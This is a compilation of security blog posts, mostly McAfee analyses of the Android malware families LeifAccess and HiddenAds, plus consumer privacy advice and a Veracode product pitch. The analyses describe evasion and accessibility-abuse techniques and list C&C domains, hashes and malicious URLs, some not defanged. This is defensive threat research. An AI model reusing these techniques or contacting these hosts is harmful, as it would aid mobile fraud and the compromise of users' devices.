Over the years, we’ve all grown accustomed to using our smartphones and mobile apps to support our lifestyles. We as consumers have developed expectations of how devices can enhance our everyday lives- from online banking transactions to handling work correspondence on the go. But as we become more reliant on our smart devices and apps, hackers use this dependency as an opportunity to gain unwarranted access to our personal data. According to McAfee’s latest Mobile Threat Report, hidden apps are the most active mobile threat facing consumers, generating nearly 50% of all malicious activities in 2019. Let’s dive into these mobile threats and how they could potentially impact your life.

Don’t Let These Mobile Threats Commandeer Your Device

LeifAccess

LeifAccess (also known as Shopper) is an Android-based malware distributed through social media, gaming platforms, and fraudulent advertising. Once installed, this stealthy hides its icon and displays fake security notifications, hoping to trick the user into granting the malware accessibility access. LeifAccess/Shopper has also been found to use third-party logins to cheat app ranking systems and wreak more havoc on victims’ devices. The malware uses the accessibility features in Android to quietly create third-party accounts, automatically download apps from Google Play, and post reviews using names and emails configured from the victim’s device.

According to the Mobile Threat Report, hackers are also tricking users into installing adware onto their devices, redirecting them to a variety of fraudulent ads. Because digital ad revenue is simply based on screens displayed and clicks, hackers are quick to exploit this threat so they can collect fraudulent ad revenue at the expense of unsuspecting users. Due to the volume and speed of the redirects, many consumers don’t even realize that their device is infected or that their data is being collected.

HiddenAds

HiddenAds masquerades as genuine apps like Call of Duty, Spotify, and FaceApp to trick users into downloading them. But once the app is installed on the victim’s device, the app icon changes to one that mimics the Settings icon. When the victim clicks on it, the app displays a fake error message that reads “Application is unavailable in your country. Click OK to uninstall.” However, clicking OK completes the malicious app installation process and then hides the fake Settings icon, making it nearly impossible to find and delete the malware.

MalBus

McAfee researchers also discovered a new targeted attack hidden in a legitimate South Korean transit app. Called MalBus, this new attack method exploits the app developer’s hacked Google Play account. Once the hackers accessed the developer’s account, they added an additional library to the apps and uploaded them to Google Play. Now, MalBus spyware can phish for   with a local webpage that mimics the real Google login screen. Additionally, MalBus can drop a malicious trojan on the victim’s device, searching for specific military or political keywords. If these keywords are found, the victim’s matching files are uploaded to a remote server without their knowledge.

How to Stay Protected

As hackers continue to target consumers through the channels they spend the most time on – their mobile devices – it’s important for users to reflect on the current digital landscape to help protect their data, as well as their family and friends. Follow these security tips to defend against stealthy mobile threats:

  • Do your research. While some malicious apps do make it through the app store screening process, the majority of attack downloads appear to be coming from social media, fake ads, and other unofficial app sources. Before downloading an app to your device, do some quick research about the source and developer.
  • Read app reviews with a critical eye. Reviews and rankings are still a good method of determining whether an app is legitimate. However, watch out for reviews that reuse simple or repetitive phrases, as this could be a sign of a fraudulent review.
  • Update, update, update. Developers are actively working to identify and address security issues. Frequently update your operating systems and apps so that they have the latest fixes and security protections.
  • Use a VPN. A virtual private network, or , allows you to send and receive data across a public network, but it encrypts your information so others can’t read it. This can prevent hackers from spying on your internet activity, therefore protecting your privacy.
  • Keep tabs on your accounts. Use ID monitoring tools to be aware of changes or actions that you did not make. These may have been caused by malware and could indicate that your phone or account has been compromised.
  • Defend your devices with security software. Comprehensive security software across all devices continues to be a strong defensive measure to protect your data and privacy from online threats.

To stay updated on all things McAfee and the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Is Mobile Malware Playing Hide and Steal on Your Device? appeared first on McAfee Blogs.

Android/LeifAccess.A is the Silent Fake Reviewer Trojan

The McAfee Mobile Research team has identified an Android malware family dubbed Android/LeifAccess.A that has been active since May 2019. This trojan was discovered globally with localized versions but  has a much higher prevalence in the USA and Brazil. As part of the payload, this trojan can abuse OAuth leveraging accessibility services to automatically create accounts in the name of a victim’s legitimate email in multiple third-party apps. Using the same approach, it can create fake reviews on the Google Play store to manipulate app rankings, perform ad-fraud (clicker functionality), update itself and execute arbitrary remote code, among other functionalities.

Meanwhile, many targeted apps affected for fake reviews are on Google Play.

This malware has not been identified in the official Android store so some of the potential distribution methods that we identified are related to social media, gaming platforms, malvertising and the direct download of the APK files from the Command and Control (C&C) Server.

Social Engineering to get Accessibility Services

Once installed, Android/LeifAccess.A does not show any icon or shortcut. It runs in the background and may ask victims to activate accessibility services to perform most of its malicious activities by displaying a toast notification, simulating a system warning as shown below:

Accessibility services were designed to assist users with disabilities, or while they were otherwise unable to fully interact with the device. However, as we have observed in banking trojans and other mobile threats, the accessibility services could also be abused by malware authors to perform malicious activities without user interaction. In recent versions of Android, Google limited the number of apps with accessibility services permission on Google Play and moved some functionality to other newly created APIs to minimize the abuse, but cyber criminals are still trying to exploit it, convincing users to activate this critical permission.

If accessibility permissions are granted, the trojan can fully perform its malicious activities; if it is not granted, it will still perform part of the possible commands such as ad-fraud, install short-cuts and update itself, opening the door to new payloads.

Fake Reviews

Based on the static analysis of the de-obfuscated second stage dex file (fields.css) it is possible to conclude that Android/LeifAccess can post fake reviews on Google Play by abusing the accessibility services:

Figure 3. De-obfuscated list of strings used as full qualified resource name of the view id access to perform fake reviews abusing accessibility services

Android/LeifAccess will try to download and install the target app because a user account only can write reviews of apps that have previously been installed. It will try to download through Google Play but there is also an implementation to download apps from an alternative market store (APKPure), as well as direct links.

Real World Example

As a real-world example of this malicious behavior it is possible to find reviews on Google Play that match with the parameters received from the C&C and stored in the de-obfuscated SharedPreferences XML files. For instance, the app ‘Super Clean-Phone Booster, Junk Cleaner & CPU Cooler’ is ranked with 4.5 stars average and more than 7k reviews, many of which are fake as they feature duplicated phrases copied from the Trojan’s command parameters.

 

Some of the fake comments contain multiple likes that could be associated to other commands performed by this malware which is able to find this text content and gives them a like:

Figure 6. Command “rate_words” that are used to vote for fraudulent reviews

Commands and Parameters Decryption

Android/LeifAccess.A stores a Hashtable map, in a SharedPreferences XML format, where the key is the function name and the value is the parameter used by the commands. To avoid detection, the real function names (plain text) and parameters are obfuscated, encrypted, salted and/or one-way hashed (md5 or sha-1).

  • Values are stored as obfuscated strings using data compression with zip.deflater and base64.enconde as defense evasion techniques. Some strings are obfuscated more than one time with the same algorithm.
  • Each key is calculated using an md5 digest checksum of the byte array produced by a custom base64 of the string resulting from a custom operation over ‘function names’ and ‘package name’ of the sample. There are hundreds of different variants of this family, each one with a different package name, so malware authors take advantage of this uniqueness in the string of the package name to use it as a salt for hashing the key values.

In figure 5 the xml <String> element contains the reviews sent by the C&C while the attribute “name” represents the hash table key. In this example the key “FF69BA5F448E26DDBE8DAE70F55738F6” is associated to the command “rate_p_words”:

MD5 is a one-way function so it is not possible to decrypt the string but, based on the static analysis, it is possible to recalculate the hash for all the decoded strings found on the second stage DEX file and then associate it with the hash-table.

Recalculation of this particular hash was possible by invoking the hash function with rate_p_words and com.services.ibgpe.hflbsqqjrmlfej as arguments.

In the same hash table other parameters are stored, such as the self-update server URL using the same encryption/obfuscation technique:

Figure 7. Obfuscated HashMap

This key F09EA69449BA00AA9A240518E501B745 and the embedded value can be interpreted as follows:

Figure 8. HashMap as plain text

Other commands are detailed in the table of commands in the appendix which includes shortcut creation and frequency of updates.

Furthermore, received commands may also be stored locally in an SQLite DB that logs part of the action performed by the malware.

Abuse of Accessibility

Deactivating Google Play Protect:

LeifAccess tries to navigate through the target app using AccessibilityNodeInfo by view-id resource name. For example, for Google Play Protect, the package is embedded on the Google Play app with package name ‘com.android.vending’ and it will try to access the view id ‘play_protect_settings:’ as defined on string g. The full qualified resource id is “com.android.vending:id/play_protect_settings” as shown in the deobfuscated code below. Then it will locate the ‘android:id/switch_widget’ to try to deactivate the scan device option.

Figure 9. List of view-id resources strings abused by LeifAccess

Fake Account Creation Abusing Single Sign On:

Another monetization technique used by this family is the creation of accounts in the name of real user identities and accounts registered on the infected device. This is achieved by abusing the accessibility services to perform an account creation and login with the Google Sign-In OAuth 2.0 that many legitimate services integrate in their apps.

Android/LeifAccess can download and install the target app to later set up an account without user interaction.

The deobfuscated code below shows how Android/LeifAccess uses AccesibilityEvent to navigate into a dating app to create an account using the Google login option.

Figure 10. AccessibilityEvent used to create fake accounts

Below are some examples of other application package names that are targeted by this malware to perform fake account creation, mostly related to categories such as shopping, dating and social.

  • zalora.android
  • tiket.gits
  • b2w.submarino
  • zzkko
  • phrendly
  • newchic.client
  • com.netshoes.app
  • makemytrip
  • like
  • lazada.android
  • joom
  • jabong.android
  • startv.hotstar
  • banggood.client
  • alibaba.intl.android.apps.poseidon
  • alibaba.aliexpresshd
  • airyrooms.android

Other Malicious Payloads

Ad Fraud:

Clicker functionality is also implemented so advertisement traffic is requested by the infected device without showing a single ad in the interface.

Specific user-agent headers are sent from C&C to perform ad-fraud.

Figure 11. Specific User-Agent

The ID for the ad network is updated via the C&C Server:

Figure 12. ID used to monetize the ads

Normally, the apps that run ads integrate one or more ad network SDKs (usually distributed as JAR libraries) into it to properly request the ad content gathering location, device type or even some user data. However, this malware does not integrate any SDK packages into the source code to access the ads. Android/LeifAccess can load ads using the proper ad-network format via direct links for Ad Clicks or Ad Impressions (IMPR) that the C&C server pre-builds and sends to it in JSON format. This means that the infected device will be able to request a URL with the full parameters required to simulate a legitimate click coming from a user clicking a banner in the context of a legitimate application, evading the SDK integration which also contributes to keep a relatively small file size.

The adware JSON structure includes:

 

Furthermore, this malware can show real ads in full screen out of the context of any app after unlocking the device if it receives the proper commands, or based on a certain frequency defined by the C&C. Also, it can show an overlay icon redirecting to ads as a floating overlay.

Arbitrary shortcuts can be created in the home screen based on the parameters received:

 

Fake Notifications

To gain accessibility services or to request the deactivation of an OS security option that has not been granted yet, the malware is able to launch toast messages to try to convince victims to perform certain actions.

Below is a list of fake notifications, including title and content, in JSON format used by the malware inside the “dialog” attribute which is executed as a toast notification in the intervals of the parameter “notifi_inter” (28800000 milliseconds, which equals 8 hours).

Figure 13. List of dialogs used as fake notifications

The ‘deactivate’ and ‘activate’ string is internationalized to match with the OS language:

 

Unpacking and Execution

To avoid detection, or as a ‘defense evasion’ technique, the original installed application is just a wrapper that, once executed, can decrypt a JAR from the asset file from path ‘assets/fields.css’ which is dynamically loaded using reflection into the main application. System API calls strings are also obfuscated using a custom base64 implementation.

Figure 14. Overview of the malware unpacking

Reversing the decrypted jar file requires deobfuscation of the strings used by Android/LeifAccess.A which are all custom encoded:

Figure 15. Deobfuscated strings using function et.a

Command and Control Server:

The command and control servers are also used for malware distribution and payload updates. The domain names contain words that can make people think they belong to a legitimate advertisement network or a Content Delivery Network (CDN):

hxxp://api.adsnativeXXX.com

hxxp://cdn.leadcdnbXXX.com/

Distribution and Telemetry

Distribution

The samples are available in the C&C hosted as direct APK links but also may be distributed in social media or as a malvertising campaign that tries to convince users to install a critical security update. This variant label is SystemSecurityUpdates and the package name starts with ‘com.services.xxxx’, pretending to be a system update.

Variants of Android/LeifAccess.A were found hosted and distributed through the Discord game chat platform. Some malicious APK variants were available in the following URL scheme:

  • hxxps://cdn.discordapp.com/attachments/XXXXXXXXX/XXXXXX

Infection requires the user to download and install the malicious APK; this means that a social engineering component is used for initial access. Scaring people about potential threats using ads, or luring gamers that want to add a  “hidden feature” makes them more willing to follow the instructions of untrusted installation flows described by attackers on posts or videos, even if they must dismiss security notifications or deactivate security measures to allow aggressive permissions or activate accessibility services.

Conclusion

The ability to install apps and then post fake reviews on Google Play in the name of a victim, create fake accounts on third party services plus the self-update mechanism, in conjunction with multiple obfuscation and encryption techniques used as self-defense, makes this piece of malware unique and allowed it to stay under the radar for victims without AV protection.

The main functions of this Trojan can be described as:

  • Download Apps from Google Play or APK Pure
  • Deactivate Google Play Protect
  • Create Fake Accounts with OAuth abusing accessibility
  • Post fake reviews on Google Play
  • Create short cuts on the main screen
  • Display Ads in the background and in full screen
  • Self-Update

Android/LeifAccess implements multiple techniques for self-defense to encrypt and obfuscate the malicious behavior and to try to avoid AV detection.

Due to the high volume of unique samples we can infer that a considerable amount of resources are destined to infrastructure and automation for sample generation in a server-side polymorphic way.

New variants are constantly deployed to keep this mobile botnet of fake reviewers alive.

This kind of malware not only damages users, it also affects App Market credibility and adversaries/ad-networks that paid for banners that nobody views.

It also suggests that a market exists for the fraudulent improvement of app reputation, and services such as this must be performed with a monetization objective very similar to what happens on social media where services exist to buy followers or likes.

These publications violate the guidelines of the Google Play Store mainly because reviews and rankings are key to helping users to select appropriate and safe apps – fake ones can ruin users’ trust.

However, this ranking manipulation is a challenge to identify and remove as these kinds of fake review are not produced by fake accounts and most anti-spam methods are designed to find content created by untrusted or unverified accounts rather than legitimate users. This same technique could be used for social media or any other platform distribution of arbitrary messages.

If you think you could be affected by this family then you can view or edit the reviews that you have written on your Google account at https://aboutme.google.com/.

Newer implementations of this malware are also identified and detected by McAfee Mobile Security as Android/LeifAccess.A and Android/LeifAccess.B.

Technical Data and IOCs

Table of Commands

Mitre ATT&CK Matrix

IoCs

6032c1a8b54f3daf9697a49fdd398d3ebe35f3fec3d945d6d8e9588043332969

com.services.ibgpe.hflbsqqjrmlfej

032184204b50f0634ad360a2090ea9904c012cb839b5a0364a53bf261ce8414e

com.services.kxyiqc.zzwkzckzfiojjzpw

0a95e9cce637a6eb71e4c663e207146fe9cde0573265d4d93433e1242189a35c

com.services.jifat.qaxtitmumdd

533a395ed16143bbe6f258f3146ea0ea3c56f71e889ace81039800803d0b1e18

com.services.xvpyv.tteawsribdsvi

6755f708d75a6b8b034eae9bcb6176679d23f2dc6eb00b8656d00f8ee0ec26c1

com.services.myzmuexri.nrphcanr

 

URLS

adsnative123[.]com

Myapkcdn[.]in

adsv123[.]com

 

References

https://android-developers.googleblog.com/2018/12/in-reviews-we-trust-making-google-play.html

The post Android/LeifAccess.A is the Silent Fake Reviewer Trojan appeared first on McAfee Blogs.

Multi-tricks HiddenAds Malware

Thousands of HiddenAds Trojan Apps Masquerade as Google Play Apps

The McAfee mobile research team has recently discovered a new variant of the HiddenAds Trojan. HiddenAds Trojan is an adware app used to display advertising and collect user data for marketing. The goal of such apps is to generate revenue by redirecting users to advertisements. There are usually two way to make money with adware; the display of advertising to a user’s computer and a per-click payment made if a user clicks on the ad.

Although it can be used for spreading and displaying advertising in an affiliate marketing program, adware can also be used to spread malware in an affiliate fraud program. Most adware programs will abuse a legitimate application to trick the user and increase the number of installations. In our analysis we focus on two fake versions of popular Android apps:

  • FaceApp: an app used to modify photos with machine learning.
  • Call of Duty: a famous game adapted for Android.

We notice that these applications are very popular and are usually downloaded by young people. Additionally, both apps are using the in app-purchase business model. These two elements are interesting because they increase the chance that people will search for free versions and have potentially low concerns regarding security. We also noticed several other HiddenAds variants masquerading as genuine apps, such as Spotify or other well-known games.

Globally, we observed more than 30,000 samples related to this HiddenAds campaign.

https://www.virustotal.com/graph/g05e894f94d9b40ab9651e0b353a66b8b4eb54e6dc8884fc2b52b86e205bc8fcc

Figure 1. Multi-tricks HiddenAds campaign

Analyzed samples are not available on the Google Play Store; the delivery of the latest variants is mostly from untrusted parts of the internet that propose APK file downloads. YouTube channels have also been spotted with malicious links to download the fake apps.

These variants of HiddenAds use some other interesting technologies to trick users and thwart the analysis of malware researchers. In this blogpost, we will deep dive into the analysis of a fake FaceApp application.

Distribution Channel

These malware samples masquerade as popular applications so, when a user wants to find the apps from an unknown source, they could be infected by malware. For example, “Call of Duty” is a popular game, with many people searching for the mobile version online. If they are unfortunate, they may find the result shown below:

Figure 2. Distribution channel

In the video, the author provides download links. If we click the link to download the file, we receive “Call of Duty_1.0.4.apk” (as seen in Table 1). If we install this sample on our devices, we will be infected by this malware. Additionally, we spotted this malware on other untrusted sources.

Trick Techniques

  1. Application name trick.

As a user, we recognize an app by its name and icon. As a researcher, the package name is an identification of an application. This variant uses popular application names, icons and package names on the Google Play store, to trick users into thinking they are genuine applications.

Table 1: Basic Information of some threat samples.

We search for the application name on Google Play and click the search result to view its details.

Figure 3. FaceApp information on Google Play.

This is a very popular application with in-app purchases. If victims want to find a free cracked version from alternative sources, they may end up with our analysis sample. The application name, icon and version number of the Google Play app and the fake app are very similar. The file size, however, is very different so we should keep that very firmly in mind.

  1. Icon trick.

Normally, users expect the icons seen before and after installation to be the same. In this sample, they are different. The sample defines two icons in the AndroidManifest.xml file; the label of activity is “Settings”.

Figure 4.1. Two icons are defined in AndroidManifest.xml

Before we install the sample, we see it in File Explorer, showing the first icon (tv_icon.png). At the system installation view, we see the first icon too. Once we click the “Done” button, the sample is installed onto the device and the system shows the second icon (but_invertc.png).

                Figure 4.2. Icons before/during/after installation

This is the icon trick. Users are surprised after they install the sample as they cannot find the expected icon on their devices; they maybe think something went wrong during installation and the application failed to install. In reality, the application has already been installed; it is next to the system “Settings” application icon. When a user goes to launch the system “Settings” application, they have the possibility to click the fake icon instead, launching the malicious application.

  1. Launcher trick.

Once a victim clicks the fake “Settings” icon, the malicious app launches, as does the next stage of the trick.

Figure 5. Hidden icon after clicking “ok” button

The sample shows this alert dialog immediately; it does not perform country available checking. This is a deceptive message, to make victims believe that the icon is hidden because “Application is unavailable in your country”. In fact, the application is still running in the background. It is not unavailable in a given country, it is just unavailable for victims.

Obfuscation Technique

Above are the ways the app is used to defraud victims. Now, we look at the anti-analysis techniques of this sample. At the start of the application, it invokes a function MultiDex.install. MultiDex is a popular and valid Android module which is used to support multi DEX files. When we investigate this function, we are curious why a popular Android module invokes a function in a specific application module.

Figure 6. The malicious code in the “MultiDex.install” function

The question prompts us to do more analysis. Finally, we find that this is the malicious code entrance. It mainly does 2 things here:

  • Decrypt so library
    The decrypted function is very obfuscated, not only obfuscating the variable name such that it makes no sense, but also splitting a simple function into lots of sub-functions, each of which inserts lots of nonsense code, designed to thwart analysis.
  • Fortunately, we can understand the code and get the decryption process.

Figure 7.1. Splits into lots of sub-functions

Figure 7.2. One sub-function, lots of code is nonsense

Reading data from resource/string.xml file according to CPU type (Figure 8.2):

  • If CPU is arm64, read x1 value.
  • If CPU is armeabi, read x0 value.
  • Other CPUs are not supported.

Figure 8.1. Read data from resource string.xml file

The data has 2 parts, the first part is the header of the ELF file, the second part is an index of array.

  • From the index (“a58ax”) in the last step, we find base64 encoding data from the arrays.xml file.
  • Use base64 and XOR operation to decode the array and generate native code library.

Figure 8.2. Base64 encoding data in the file resources.arsc/res/values/arrays.xml

 3) Load so library to extract the DEX payload and, finally, the malicious code invokes system.load to load the so library and calls a native function.

Figure 9. Load so library and call a native function

In the native function, it will extract and decrypt the file assets/geocalc_lite.dat and restore the DEX payload to path /data/data/de.fastnc.android.geocalc_lite/app_app_apk/geocalc_lite.dat.jar.

DEX Payload Analysis

The DEX Payload is used for showing advertisements. The advertisement data comes from the server. Once the payload gets the data, it will show it on the device. From the code analysis, we see there are dozens of advertisement types (Figure 12.2). The payload, which is very complex, will load and show the data in different ways for each type.

  • Default Setting Parameters
    The DEX payload defines a base64 encoding string in code; we get lots of default setting parameters after decoding it:

Figure 10.1. Default setting parameters (Encoding)

        

Figure 10.2. Default setting parameters (Decoding)

This is a json object; it is very complex and below is the usage of some parameters:

  • metricsApiKey: The API Key of Yandex Metrica SDK.
  • installFrequencySeconds : This is used to control the frequency of ‘install’ request. The value decides the minimum time interval of sending ‘install’ requests (see the Request & Response section) which, in this instance, is 1000 seconds(16 minutes 40 seconds). The install request can only be triggered by the application launcher. However many times we restart the application, it only sends one request in 1000 seconds.
  • overappStartDelaySeconds : This is designed to control the delay of http requests. It is intended to execute malicious payloads after 30000 seconds (5 hours 20 minutes) from the first launch. But in the current version, this value is the same as ‘installFrequencySeconds’ and is used to control install frequency. The smaller value of ‘overappStartDelaySeconds’ and ‘installFrequencySeconds’ is used as the minimum time interval of sending install requests.
  • bundles_*(b,c,l,n): It looks like these are used for determining whether to show advertisements in these packages or not.

The parameter “domains” is an important one; it defines the remote server candidate list. Payload selects a random one as the remote server; if the selected one is unavailable, it will switch to the next one.

Request & Response

There are 3 types of requests in the payload, with different requests having different trigger conditions. We can only capture 2 types of requests:

Figure 11.1. Request & response capture

  1. ‘install’ Request
    During application launch, if the trigger conditions are satisfied, the payload will send an ‘install’ request to the remote server. This request has a file named “type” whose value is “install”.

Figure 11.2. Install request

The client filed is a json object too; it contains the versionName and sdkEdition information, both of which show that this payload is very new.

Figure 11.3  VersionName and sdkEdition definition

The responses from the remote server are often an empty json which increases the difficulty of our analysis. We continued testing for a few days and captured a non-empty response.

Figure 11.4. Response data

The remote server settings cover the default settings:

  • Enabled: Advertisement enabled flag, including below ‘b/request’ request. The default is False, and True is set from a remote server response.
    • 7 new domains in response: ‘http://hurgadont.com’, ‘http://asfintom.com’, ‘http://eklampa.com’, ‘http://glanmoran.com’, ‘http://cantomus.com’, ‘http://fumirol.com’ and ‘http://bartingor.com’
    • 7 default domains: “http://minasorp.com”,”http://omatist.com”,”http://retinba.com”,”http://baradont.com”,”http://lindostan.com”, “http://avgon.net” and “http://dorontalka.com”

There are 7 new servers and 7 default servers, a total 14 servers, and we can ping all of them; they are alive.

2. ‘b/request’ request

This is a core request. There is a field named ‘type’ and its value is ‘b/request’ in this request.

Figure 12.1   b/request request

The library registers lots of event filters/observers and, when these events happen, the trigger conditions are satisfied, causing the library to send appropriate requests to the remote server.

Table 2: Event monitoring

Banner Type is used to identify the banner and Spot is used to identify the spotting of events.

Figure 12.2. Banner Type & Spot Type

 The response data is as below. It has 3 main functionalities:

  • ‘sdkUpdate’ data: Used to load updated versions of the SDK file.
  • ‘banners’ data: Used to show banner advertisements.
  • ‘mediatorSDKs’ data: Used to post mediatorSDKs requests on victims’ devices.

Figure 12.3. ‘b/request’ Response

  • Banner data

We mentioned that we captured a response of ‘b/request’ in Figure 11.1. The response contains one banner data, the fields of banner data are as below after decoding.

Figure 12.4. Banner data and ‘html’ field content

                ‘html’ is the most important field – payload content is loaded in a WebView by invoking the loadDataWithBaseURL API. According to the html, WebView will load the page from the first URL, hxxp://bestadbid.com/afu.php?zoneid=1558701. This is a redirect URL that will redirect to different URLs each time we open it.  In our test, it redirects to a gambling website.

Figure 12.5. Redirect to a gambling website

  • mediatorSdks data: mediatorSdks data is a json array. Each item definition is as below. We cannot capture this type of data from the remote server as we do not know the real value of each field. According to our analysis, “tracking” is a URL list. Each URL will be executed on the device and the executed result sent to the remote server.

Figure 12.6. mediatorSdks item definition

3) Mediator Stat requests: After the Tracking URL executes, it will execute /sdk/stat/mediator_* requests to the remote server which just reports the execute results. There are 4 types of mediator requests, one is for reporting failure status, the other 3 types are for reporting success status. There are 3 types of success status; we guess that there are 3 types of Tracking URL in mediatorSdks data (Figure 12.6). Each type of Tracking URL uses each mediator stat request to report status.

Figure 12.7. 4 types of mediator stat request

Conclusion

This is a traditional Hidden Icon Ads malware; it hides the application’s icon first, then shows advertisements from the DEX payload. But it applies lots of technology to implement its purpose, to trick users into believing it is a normal application, to stymie the detection of security tools. The DEX payload is a very complex SDK – more than 14 candidates of remote servers are found, lots of event monitoring and remote trigger control, all of which mean this is a well-designed malware. Once victims are infected with this malware they are unlikely to realize it and, even if they do, they may not be able to locate and remove it.

McAfee Mobile Security detects this threat as Android/HiddenAds. To protect yourselves from this and similar threats, employ the McAfee Mobile Security application on your mobile devices and do not install apps from unknown sources.

For more information about McAfee Mobile Security, visit https://www.mcafeemobilesecurity.com.

Hashes

bc6f9c6d9beecd6f1353953ef6d883c51739ecec7e5b55e15319fe0d0b124a6d

7c40fabb70556d7d294957ec0fa1215a014a33f262710a793dd927100b183454

12be1c7ffdcf1b1917b71afa4b65a84b126ab0f0fbf6dc13390a32e6a8b84048

ed47a5871132c22bf4b7888908f35cacc2cd0c2a6e8e0afffea61d0e14792ea4

8c5826441a7000f957ece60a3e5294732f9a430d4bec0113bb13b99c73fba47c

04e6493d3cb0b92bebb450f37b21f9176fe266c662f65919baf7d62297

The post Multi-tricks HiddenAds Malware appeared first on McAfee Blogs.

Do I Need to Hide My IP Address?

What is an IP Address?

Think of this as your address on the internet — a location where you receive mail and other data such as webpages, images, and mesages. Your IP address is made up of a string of four groups of numbers, such as 192.172.33.1, which identifies both the network you are on and the device you are using. With these two pieces of information networks and websites can both route data to you and check that you have permission to access it.

Why Would I Want to Hide My IP Address?

Since your IP address is needed to surf around the web, it can act as a fingerprint of your online activities. Webpages may choose to store this information to learn more about you and your interests for marketing purposes. Your data can also be potentially sold to third parties without your consent, or used to spy on you if someone has malicious intent. An example of this would be so-called “spyware,” which can covertly log the sites you visit.

IP addresses are also used to restrict access to content, such as streaming services that are only available in certain locations. But hiding your IP address for this purpose is not something we advocate.

How Do I Hide My IP Address?

There are two main ways to hide your IP address: by using a virtual private network (VPN), or a proxy server. VPNs are the most common tools used by consumers to mask their IP addresses. This is a piece of software that allows you to create a secure connection to another server over the internet, so your data appears to come from the server you connect to. So, if you are in Los Angeles, for instance, the software can connect you to a server in London, hiding your actual location since your traffic appears to originate in London.

A proxy server is different in that it acts like a middleman between your device and the server you are trying to connect with. It receives a request from your device and then retrieves that information from the target server. The proxy can be either a computer or a piece of software that performs this function. It’s different from a VPN in that it doesn’t encrypt, or scramble, your information, making it less secure. That’s why we suggest that you use a VPN.

When Should I use a VPN?

There are a few scenarios when you may want to hide your IP address. The first is if you’re using public Wi-Fi, because your browsing activity might be accessible to anyone nearby. If you use a VPN, you can make a secure connection to the network and keep your activities private.

You may also choose to hide your IP address if you are concerned about your privacy on the web in general and want to make sure that there are no websites or cybercriminals tracking you.

Finally, users who want to connect with a private business or home network may also choose to use a VPN. Many businesses, for example, only allow their employees to connect to their internal network if their IP address is coming from an approved network. With a VPN, you can connect to the internal network from anywhere and you will be allowed access since it is coming from an approved IP address.

Other Ways to Protect Your Privacy

  • Check the privacy of all of your accounts to make sure they are on the strictest settings. On social media, make sure that only friends can see your information.
  • Turn off location services on websites and apps if you don’t need to use them. Unless you are using a service for mapping, or other location-critical functions, there is no reason to share your movements through the world.
  • Use complicated passwords and passphrases and keep them private. Password managers can help make this easier.
  • Install comprehensive security software on all of your devices. Try to choose a product that includes a VPN and identity theft protection.
  • When on a public Wi-Fi network, like in an airport or hotel, always use a VPN if you want to do banking and other sensitive activities securely.
  • Keep up-to-date on the latest threats, and how to avoid them.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

 

The post Do I Need to Hide My IP Address? appeared first on McAfee Blogs.

Four Critical Steps to Speeding up DevSecOps Programs

The power of DevSecOps is undeniable. As more organizations adopt this methodology, it???s clearer than ever that writing secure code isn???t more time-consuming or complicated than writing insecure code???it all comes down to the right tools, training, and integrations. Incorporating security-minded processes into the development cycle early and often exposes developers to flaws and vulnerabilities sooner, which means they???re empowered to adjust course and plan resourcefully while sharpening their skills. ツ?

The main principles that help organizations successfully secure their DevSecOps programs embrace a few key themes: automating security, maintaining operational visibility, and reducing false alarms. When paired with powerful tools that help developers work smarter, these crucial steps can speed up your DevSecOps program and set your development team on course for smooth sailing to deployment.

Have an array of capable solutions at your fingertips

Overcoming DevSecOps challenges to combine developer enablement with security governance can be tricky if you have a hodgepodge of solutions that are difficult to scale. It???s even harder when teams lack the bandwidth or essential skills necessary to manage these DevSecOps programs. Organizations need tools that work smarter, allowing developers to focus on the tasks and projects that propel development forward instead of slowing it down.

For most businesses, this means a robust SaaS solution that provides a scalable service at a lower cost. In addition, having all application analysis types in one solution streamlines testing and reporting. Veracode combines all testing types???Static Analysis, Dynamic Analysis, Software Composition Analysis, and Pen Testing???in one place.

Opt for seamless integration and simple automation

Successful application security strategies weave automation into testing processes early and often to find flaws fast. It???s also essential to keep development and security teams working with the tools they have, integrating application security into their existing solutions and processes.

When development teams are tasked with delivering high-quality code faster than ever before, automated code testing tools bridge the gap to seamlessly and efficiently integrate security into the software development lifecycle (SDLC). Veracode???s solutions are built to keep up with the demand for automation and speed, with APIs and plugins that don???t interrupt the coding process.

For instance, Veracode???s Pipeline Scan directly embeds into teams??? CI tooling and provides fast feedback on flaws being introduced on new commits. Teams can break the build if policy-violating flaws, based on severity or CWE category, are introduced on a commit or net-new security issues are found. Because this scan is built in line with best-in-class CI tooling, there is no learning curve for developers. Another example: Veracode???s defect-tracking integration with Jira can automatically create a defect for each new security finding with no buttons to push.

Minimize false-positive rates to speed up development

False positives slow everything down. They erode developer confidence and chip away at speed, with rule tweaking and manual reviews only compounding the issue. Veracode Static Analysis offers an industry-leading 1.1 percent false-positive rate???verified by our customers and the thousands of applications we???ve scanned.

That???s a lot faster than the competition???s 32 percent false positive rate, and as a SaaS-based platform, there???s no need to manually fine-tune or suppress rules. Developers are free to focus on real flaws and won???t need to spend as much time chasing down false positives.

Stay on top of analytical data

Many organizations see their AppSec programs struggle because they do not have data-driven insights to help develop, manage, and mature their programs. Veracode???s analytics provides customers with visibility into data that helps them overcome common challenges, including reporting the success of their AppSec program, determining future investment paths and ROI, and how to optimize and mature their program over time. AppSec analytics allow stakeholders and decision-makers to benchmark success and determine where developers may need more training to improve their remediation skills.

The proof is in the numbers, right? Veracode analytics give our customers the edge of insight, providing data from Static Analysis, Dynamic Analysis, Penetration Testing, and Software Composition Analysis all in one place.

Organizations can implement standard or fully customized policies that meet their own business needs and have one clear report in hand to prove compliance with pass or fail results based on their defined criteria. That data can then be reported directly into an organization???s governance, risk, and compliance (GRC) system without missing a beat. That???s a big step forward in achieving security goals by working smarter, not harder.

Ready to learn more? Schedule a demo to discover how you can implement and supercharge your DevSecOps program.

Cyber Security Roundup for March 2020

A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, February 2020.

Redcar and Cleveland Borough Council became the latest UK organisation to become the victim of a mass ransomware attack which started on 8th February.  The north-east Council's servers, PCs, mobile devices, websites and even phone lines have been down for three weeks at the time of writing. A Redcar and Cleveland councillor told the Guardian it would take several months to recover and the cost is expected to between £11m and £18m to repair the damage done. A significant sum for the cash-strapped council, which confirmed their outage as ransomware caused 19 days after the attack. The strain of ransomware involved and the method initial infiltration into the council's IT systems has yet to be confirmed.


